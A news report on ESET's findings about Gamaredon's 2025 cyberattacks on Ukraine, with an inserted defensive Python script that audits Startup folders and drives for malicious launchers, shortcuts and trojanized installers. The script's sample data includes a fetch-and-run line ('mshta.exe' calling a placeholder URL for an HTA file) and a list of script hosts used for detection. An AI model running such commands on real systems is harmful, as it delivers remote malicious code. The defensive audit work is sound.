
Russian hackers Gamaredon scaled up cyberattacks against Ukraine using new malware and abuse of cloud services

In 2025, the Russian hacking group Gamaredon conducted 35 separate targeted phishing campaigns against Ukraine, with the majority of attacks occurring in the second half of the year. The main targets of the attackers were Ukrainian state and military institutions.


This was reported by the Slovak cybersecurity company ESET, as The Hacker News reports.

“Throughout 2025, Gamaredon hackers were highly active and focused exclusively on Ukraine,” ESET noted. “The ultimate goal of the group remains the theft of confidential information and other critical data that can be used to support Russia’s interests in the protracted war against Ukraine.”

To carry out targeted phishing, the hackers use embedded archives or XHTML files. Using a stealthy download technique, they deliver malicious HTA downloaders to the device, which then install further malware, including PteroSand. In some attacks the attackers have also exploited a recently patched vulnerability in WinRAR (CVE-2025-8088) to drop a malicious file directly into the victim’s Windows Startup folder.

As a result, the malware starts automatically at every subsequent login, giving the hackers a persistent foothold on the computer. To move further within the compromised network, Gamaredon uses the PteroLNK and PteroPaste tools, which infect flash drives and network drives with malicious LNK files. When an unsuspecting user opens such a shortcut, the main malware is automatically downloaded.

The hackers also use PteroSetup, an older VBScript-based tool that was first spotted in January 2021 and has since been considered deprecated. It searches flash drives and network drives for ordinary program installer files and replaces them with self-extracting 7z (SFX) archives; inside such an archive the original installer is hidden alongside a malicious VBScript loader.
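As an added example, not code from the article or from ESET, the following Python audit script takes the defender's view of the two passages above. It checks a directory tree for the artefacts they describe: script launchers (HTA/VBS) and LNK shortcuts that invoke a script host, of the kind dropped into the Startup folder or onto removable drives, and installer executables that have been replaced by 7z self-extracting archives. The sample Startup and USB folders, the file names and the placeholder URL are constructed for the demonstration; the 7z-signature check and the UTF-16LE string scan are generic heuristics, not ESET's detection logic.

```python
import os
import re
import tempfile
from dataclasses import dataclass

# Launcher types the article describes being dropped into Startup or onto
# removable/network drives: HTA/VBScript downloaders and LNK shortcuts.
LAUNCHER_EXTENSIONS = {".hta", ".vbs", ".vbe", ".js", ".jse", ".lnk", ".cmd", ".bat"}

# Script hosts a malicious shortcut typically launches (heuristic list).
SCRIPT_HOSTS = ("mshta", "wscript", "cscript", "powershell", "cmd.exe")

# 7-Zip archive signature. A 7z SFX is a PE stub with the archive appended,
# so the signature appears somewhere after the "MZ" header.
SEVENZIP_MAGIC = b"\x37\x7a\xbc\xaf\x27\x1c"

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


@dataclass
class Finding:
    path: str
    reason: str


def extract_strings(data: bytes) -> list[str]:
    """Printable ASCII and UTF-16LE runs (LNK files store their target and arguments as UTF-16LE)."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(data)]
    return found


def lnk_targets_script_host(data: bytes) -> bool:
    """Heuristic: the shortcut's embedded strings mention a script interpreter."""
    blob = " ".join(extract_strings(data)).lower()
    return any(host in blob for host in SCRIPT_HOSTS)


def is_7z_sfx(data: bytes) -> bool:
    """A PE executable with a 7z archive appended after the stub (self-extracting archive)."""
    return data[:2] == b"MZ" and data.find(SEVENZIP_MAGIC, 2) != -1


def audit_directory(root: str) -> list[Finding]:
    """Walk an audited location (Startup folder, USB root, network share) and flag suspicious files."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                data = fh.read()
            if ext == ".lnk" and lnk_targets_script_host(data):
                findings.append(Finding(path, "LNK shortcut launches a script host"))
            elif ext in LAUNCHER_EXTENSIONS and ext != ".lnk":
                findings.append(Finding(path, f"script launcher ({ext}) in audited location"))
            elif ext == ".exe" and is_7z_sfx(data):
                findings.append(Finding(path, "installer is a 7z self-extracting archive"))
    return findings


def audit_names(root: str) -> list[str]:
    """Sorted base names of flagged files; convenient for reporting and testing."""
    return sorted(os.path.basename(f.path) for f in audit_directory(root))


def build_sample_tree() -> str:
    """Constructed sample data (not real malware): a fake Startup folder and a fake USB root."""
    root = tempfile.mkdtemp(prefix="startup_audit_")
    startup = os.path.join(root, "Startup")
    usb = os.path.join(root, "USB")
    os.makedirs(startup)
    os.makedirs(usb)
    # LNK header stub (76 bytes) followed by a UTF-16LE target string.
    header = b"L\x00\x00\x00" + b"\x00" * 72
    with open(os.path.join(usb, "Report.lnk"), "wb") as f:   # benign shortcut
        f.write(header + "C:\\Windows\\notepad.exe".encode("utf-16-le"))
    with open(os.path.join(usb, "Documents.lnk"), "wb") as f:  # suspicious shortcut
        f.write(header + "mshta.exe http://placeholder.invalid/x.hta".encode("utf-16-le"))
    with open(os.path.join(startup, "update.hta"), "wb") as f:  # downloader in Startup
        f.write(b"<script>/* placeholder */</script>")
    with open(os.path.join(usb, "setup.exe"), "wb") as f:       # ordinary installer
        f.write(b"MZ" + b"\x90" * 64)
    with open(os.path.join(usb, "setup_trojanized.exe"), "wb") as f:  # installer swapped for a 7z SFX
        f.write(b"MZ" + b"\x90" * 64 + SEVENZIP_MAGIC + b"\x00" * 16)
    return root


if __name__ == "__main__":
    for finding in audit_directory(build_sample_tree()):
        print(f"{finding.reason}: {finding.path}")
```

Pointing `audit_directory` at a user's real Startup folder or the root of a mounted drive gives the same three classes of findings; on a production host the 7z SFX check should be paired with an allow-list, since legitimate installers are also shipped as SFX archives.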

“During 2025, the group began to use third-party tools much more actively. Tunneling services and serverless computing platforms became key elements with which the attackers hid their real backend infrastructure,” ESET experts noted.

“Although the group took a short operational pause in January 2025, Gamaredon devoted most of the first half of the year to developing and deploying new tools,” noted ESET researcher Zoltan Rusnak.

“Many updates appeared on the eve of major holidays in Russia and Crimea. It is noteworthy that no updates were recorded during the holidays themselves or immediately after them. This further supports the fact that Gamaredon operators are likely full-time civil servants.”

Another notable aspect of the group’s campaign is its use of a wide range of legitimate services as channels for data exfiltration and as “dead drops” from which the malware obtains C2 server details and is redirected to infrastructure already hidden behind tunnels or serverless computing.

“As in previous years, the group compensated for the relative simplicity of its malware with persistence, frequent updates, and increasingly creative abuse of legitimate online services,” ESET noted. “Gamaredon further expanded its use of digital ‘cache’, tunnels, serverless computing, dynamic DNS, and cloud storage, making its operations more flexible and much more difficult to counter.”
